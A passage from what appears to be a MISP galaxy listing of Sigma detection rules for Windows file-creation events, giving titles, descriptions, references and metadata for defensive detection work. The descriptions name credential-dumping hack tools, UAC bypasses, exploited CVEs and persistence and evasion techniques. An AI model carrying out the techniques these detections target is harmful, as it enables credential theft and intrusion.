| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-01-23 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_office_macro_files_from_susp_process.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1566.001'] |
File Creation In Suspicious Directory By Msdt.EXE
Detects msdt.exe creating files in suspicious directories, which could be a sign of exploitation of either the Follina or the DogWalk vulnerability.
Internal MISP references
UUID 318557a5-150c-4c8d-b70e-a9910e199857 which can be used as unique global reference for File Creation In Suspicious Directory By Msdt.EXE in MISP communities and other software using the MISP galaxy
External references
- https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd - webarchive
- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Vadim Varganov, Florian Roth (Nextron Systems) |
| creation_date | 2022-08-24 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_msdt_susp_directories.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001', 'cve.2022-30190'] |
Potentially Suspicious DMP/HDMP File Creation
Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
Internal MISP references
UUID aba15bdd-657f-422a-bab3-ac2d2a0d6f1c which can be used as unique global reference for Potentially Suspicious DMP/HDMP File Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-09-07 |
| falsepositive | ['Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.'] |
| filename | file_event_win_dump_file_susp_creation.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
UAC Bypass Using IDiagnostic Profile - File
Detects the creation of a file by "dllhost.exe" in the System32 directory as part of the "IDiagnosticProfileUAC" UAC bypass technique.
Internal MISP references
UUID 48ea844d-19b1-4642-944e-fe39c2cc1fec which can be used as unique global reference for UAC Bypass Using IDiagnostic Profile - File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-03 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_uac_bypass_idiagnostic_profile.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Assembly DLL Creation Via AspNetCompiler
Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
Internal MISP references
UUID 4c7f49ee-2638-43bb-b85b-ce676c30b260 which can be used as unique global reference for Assembly DLL Creation Via AspNetCompiler in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-14 |
| falsepositive | ['Legitimate assembly compilation using a build provider'] |
| filename | file_event_win_aspnet_temp_files.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution'] |
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and a copied (possibly renamed) cscript.exe.
Internal MISP references
UUID d353dac0-1b41-46c2-820c-d7d2561fc6ed which can be used as unique global reference for AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Julia Fomina, oscd.community |
| creation_date | 2020-10-06 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_winrm_awl_bypass.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1216'] |
Suspicious Desktopimgdownldr Target File
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
Internal MISP references
UUID fc4f4817-0c53-4683-a4ee-b17a64bc1039 which can be used as unique global reference for Suspicious Desktopimgdownldr Target File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2020-07-03 |
| falsepositive | ['False positives depend on scripts and administrative tools used in the monitored environment'] |
| filename | file_event_win_susp_desktopimgdownldr_file.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1105'] |
Installation of TeamViewer Desktop
TeamViewer_Desktop.exe is created during installation.
Internal MISP references
UUID 9711de76-5d4f-4c50-a94f-21e4e8f8384d which can be used as unique global reference for Installation of TeamViewer Desktop in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-28 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_install_teamviewer_desktop.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
HackTool - SafetyKatz Dump Indicator
Detects default lsass dump filename generated by SafetyKatz.
Internal MISP references
UUID e074832a-eada-4fd7-94a1-10642b130e16 which can be used as unique global reference for HackTool - SafetyKatz Dump Indicator in MISP communities and other software using the MISP galaxy
External references
- https://github.com/GhostPack/SafetyKatz - webarchive
- https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Markus Neis |
| creation_date | 2018-07-24 |
| falsepositive | ['Rare legitimate files with similar filename structure'] |
| filename | file_event_win_hktl_safetykatz.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
.RDP File Created By Uncommon Application
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
Internal MISP references
UUID fccfb43e-09a7-4bd2-8b37-a5a7df33386d which can be used as unique global reference for .RDP File Created By Uncommon Application in MISP communities and other software using the MISP galaxy
External references
- https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/ - webarchive
- https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rdp_file_susp_creation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-04-18 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_rdp_file_susp_creation.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
UAC Bypass Using Windows Media Player - File
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Internal MISP references
UUID 68578b43-65df-4f81-9a9b-92f32711a951 which can be used as unique global reference for UAC Bypass Using Windows Media Player - File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-23 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_uac_bypass_wmp.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Suspicious Interactive PowerShell as SYSTEM
Detects the creation of files that indicate interactive use of PowerShell in the SYSTEM user context.
Internal MISP references
UUID 5b40a734-99b6-4b98-a1d0-1cea51a08ab2 which can be used as unique global reference for Suspicious Interactive PowerShell as SYSTEM in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-12-07 |
| falsepositive | ['Administrative activity', 'PowerShell scripts running as SYSTEM user'] |
| filename | file_event_win_susp_system_interactive_powershell.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Legitimate Application Dropped Archive
Detects programs on a Windows system that should not write an archive to disk
Internal MISP references
UUID 654fcc6d-840d-4844-9b07-2c3300e54a26 which can be used as unique global reference for Legitimate Application Dropped Archive in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Florian Roth |
| creation_date | 2022-08-21 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_legitimate_app_dropping_archive.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
PowerShell Module File Created
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
Internal MISP references
UUID e36941d0-c0f0-443f-bc6f-cb2952eb69ea which can be used as unique global reference for PowerShell Module File Created in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-09 |
| falsepositive | ['Likely'] |
| filename | file_event_win_powershell_module_creation.yml |
| level | low |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence'] |
UAC Bypass Abusing Winsat Path Parsing - File
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Internal MISP references
UUID 155dbf56-e0a4-4dd0-8905-8a98705045e8 which can be used as unique global reference for UAC Bypass Abusing Winsat Path Parsing - File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-30 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_uac_bypass_winsat.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Suspicious ASPX File Drop by Exchange
Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
Internal MISP references
UUID bd1212e5-78da-431e-95fa-c58e3237a8e6 which can be used as unique global reference for Suspicious ASPX File Drop by Exchange in MISP communities and other software using the MISP galaxy
External references
- https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html - webarchive
- https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html - webarchive
- https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), MSTI (query, idea) |
| creation_date | 2022-10-01 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_exchange_webshell_drop.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1505.003'] |
Self Extraction Directive File Created In Potentially Suspicious Location
Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
Internal MISP references
UUID 760e75d8-c3b5-409b-a9bf-6130b4c4603f which can be used as unique global reference for Self Extraction Directive File Created In Potentially Suspicious Location in MISP communities and other software using the MISP galaxy
External references
- https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html - webarchive
- https://en.wikipedia.org/wiki/IExpress - webarchive
- https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sed_file_creation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Joseliyo Sanchez, @Joseliyo_Jstnk |
| creation_date | 2024-02-05 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_sed_file_creation.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Suspicious PROCEXP152.sys File Created In TMP
Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
Internal MISP references
UUID 3da70954-0f2c-4103-adff-b7440368f50e which can be used as unique global reference for Suspicious PROCEXP152.sys File Created In TMP in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | xknow (@xknow_infosec), xorxes (@xor_xes) |
| creation_date | 2019-04-08 |
| falsepositive | ["Other legitimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it."] |
| filename | file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.t1562.001', 'attack.defense-evasion'] |
Suspicious Binary Writes Via AnyDesk
Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
Internal MISP references
UUID 2d367498-5112-4ae5-a06a-96e7bc33a211 which can be used as unique global reference for Suspicious Binary Writes Via AnyDesk in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-28 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_anydesk_writing_susp_binaries.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Potential File Extension Spoofing Using Right-to-Left Override
Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extension.
Internal MISP references
UUID 979baf41-ca44-4540-9d0c-4fcef3b5a3a4 which can be used as unique global reference for Potential File Extension Spoofing Using Right-to-Left Override in MISP communities and other software using the MISP galaxy
External references
- https://tria.ge/241015-l98snsyeje/behavioral2 - webarchive
- https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method - webarchive
- https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf - webarchive
- https://redcanary.com/blog/right-to-left-override/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2024-11-17 |
| falsepositive | ['Filenames that contain scripts such as Arabic or Hebrew might make use of this character'] |
| filename | file_event_win_susp_right_to_left_override_extension_spoofing.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.t1036.002'] |
WinSxS Executable File Creation By Non-System Process
Detects the creation of binaries in the WinSxS folder by non-system processes
Internal MISP references
UUID 34746e8c-5fb8-415a-b135-0abc167e912a which can be used as unique global reference for WinSxS Executable File Creation By Non-System Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-11 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_winsxs_binary_creation.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution'] |
Suspicious File Creation In Uncommon AppData Folder
Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well-known directories (Local, Roaming, LocalLow). This could be used to bypass detections that exclude the AppData folder for fear of false positives.
Internal MISP references
UUID d7b50671-d1ad-4871-aa60-5aa5b331fe04 which can be used as unique global reference for Suspicious File Creation In Uncommon AppData Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-05 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_new_files_in_uncommon_appdata_folder.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution'] |
DLL Search Order Hijacking Via Additional Space in Path
Detects when an attacker creates a folder structure similar to Windows system folders (such as Windows, Program Files...) but with an additional space, in order to trick the DLL load search order and perform a "DLL Search Order Hijacking" attack.
Internal MISP references
UUID b6f91281-20aa-446a-b986-38a92813a18f which can be used as unique global reference for DLL Search Order Hijacking Via Additional Space in Path in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-30 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_dll_sideloading_space_path.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1574.001'] |
Advanced IP Scanner - File Event
Detects the use of Advanced IP Scanner, which appears to be a popular tool among ransomware groups.
Internal MISP references
UUID fed85bf9-e075-4280-9159-fbe8a023d6fa which can be used as unique global reference for Advanced IP Scanner - File Event in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html - webarchive
- https://labs.f-secure.com/blog/prelude-to-ransomware-systembc - webarchive
- https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer - webarchive
- https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf - webarchive
- https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @ROxPinTeddy |
| creation_date | 2020-05-12 |
| falsepositive | ['Legitimate administrative use'] |
| filename | file_event_win_advanced_ip_scanner.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1046'] |
VHD Image Download Via Browser
Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
Internal MISP references
UUID 8468111a-ef07-4654-903b-b863a80bbc95 which can be used as unique global reference for VHD Image Download Via Browser in MISP communities and other software using the MISP galaxy
External references
- https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/ - webarchive
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ - webarchive
- https://redcanary.com/blog/intelligence-insights-october-2021/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' |
| creation_date | 2021-10-25 |
| falsepositive | ['Legitimate downloads of ".vhd" files would also trigger this'] |
| filename | file_event_win_vhd_download_via_browsers.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.resource-development', 'attack.t1587.001'] |
LiveKD Kernel Memory Dump File Created
Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
Internal MISP references
UUID 814ddeca-3d31-4265-8e07-8cc54fb44903 which can be used as unique global reference for LiveKD Kernel Memory Dump File Created in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-16 |
| falsepositive | ['In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.'] |
| filename | file_event_win_sysinternals_livekd_default_dump_name.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation'] |
Suspicious Screensaver Binary File Creation
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
Internal MISP references
UUID 97aa2e88-555c-450d-85a6-229bcd87efb8 which can be used as unique global reference for Suspicious Screensaver Binary File Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-29 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_creation_scr_binary_file.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.002'] |
Creation of a Diagcab
Detects the creation of a diagcab file, which could be caused by a legitimate installer or be a sign of exploitation (review the filename and its location).
Internal MISP references
UUID 3d0ed417-3d94-4963-a562-4a92c940656a which can be used as unique global reference for Creation of a Diagcab in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-06-08 |
| falsepositive | ['Legitimate Microsoft diagcab'] |
| filename | file_event_win_susp_diagcab.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.resource-development'] |
GatherNetworkInfo.VBS Reconnaissance Script Output
Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
Internal MISP references
UUID f92a6f1e-a512-4a15-9735-da09e78d7273 which can be used as unique global reference for GatherNetworkInfo.VBS Reconnaissance Script Output in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government - webarchive
- https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-08 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_lolbin_gather_network_info_script_output.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.discovery'] |
RemCom Service File Creation
Detects default RemCom service filename which indicates RemCom service installation and execution
Internal MISP references
UUID 7eff1a7f-dd45-4c20-877a-f21e342a7611 which can be used as unique global reference for RemCom Service File Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-04 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_remcom_service.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1569.002', 'attack.s0029'] |
Anydesk Temporary Artefact
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Internal MISP references
UUID 0b9ad457-2554-44c1-82c2-d56a99c42377 which can be used as unique global reference for Anydesk Temporary Artefact in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-11 |
| falsepositive | ['Legitimate use'] |
| filename | file_event_win_anydesk_artefact.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Suspicious Creation with Colorcpl
Once executed, colorcpl.exe copies an arbitrary file to c:\windows\system32\spool\drivers\color\
Internal MISP references
UUID e15b518d-b4ce-4410-a9cd-501f23ce4a18 which can be used as unique global reference for Suspicious Creation with Colorcpl in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-21 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_colorcpl.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564'] |
WinRAR Creating Files in Startup Locations
Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088.
Internal MISP references
UUID 74a2b37d-fea4-41e0-9ac7-c9fbcf1f60cc which can be used as unique global reference for WinRAR Creating Files in Startup Locations in MISP communities and other software using the MISP galaxy
External references
- https://x.com/0x534c/status/1944694507787710685 - webarchive
- https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/ - webarchive
- https://github.com/mulwareX/CVE-2025-6218-POC - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrar_file_creation_in_startup_folder.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-07-16 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_winrar_file_creation_in_startup_folder.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators
Detects the creation of files with specific names used by the RemoteKrbRelay SMB Relay attack module.
Internal MISP references
UUID 3ab79e90-9fab-4cdf-a7b2-6522bc742adb which can be used as unique global reference for HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators in MISP communities and other software using the MISP galaxy
External references
- https://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_krbrelay_remote_ioc.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-06-27 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_hktl_krbrelay_remote_ioc.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Process Monitor Driver Creation By Non-Sysinternals Binary
Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
Internal MISP references
UUID a05baa88-e922-4001-bc4d-8738135f27de which can be used as unique global reference for Process Monitor Driver Creation By Non-Sysinternals Binary in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-05 |
| falsepositive | ['Some false positives may occur with legitimate renamed process monitor binaries'] |
| filename | file_event_win_sysinternals_procmon_driver_susp_creation.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1068'] |
Potential Persistence Via Microsoft Office Startup Folder
Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
Internal MISP references
UUID 0e20c89d-2264-44ae-8238-aeeaba609ece which can be used as unique global reference for Potential Persistence Via Microsoft Office Startup Folder in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders - webarchive
- https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_startup_persistence.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-02 |
| falsepositive | ['Loading a user environment from a backup or a domain controller', 'Synchronization of templates'] |
| filename | file_event_win_office_startup_persistence.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1137'] |
Process Explorer Driver Creation By Non-Sysinternals Binary
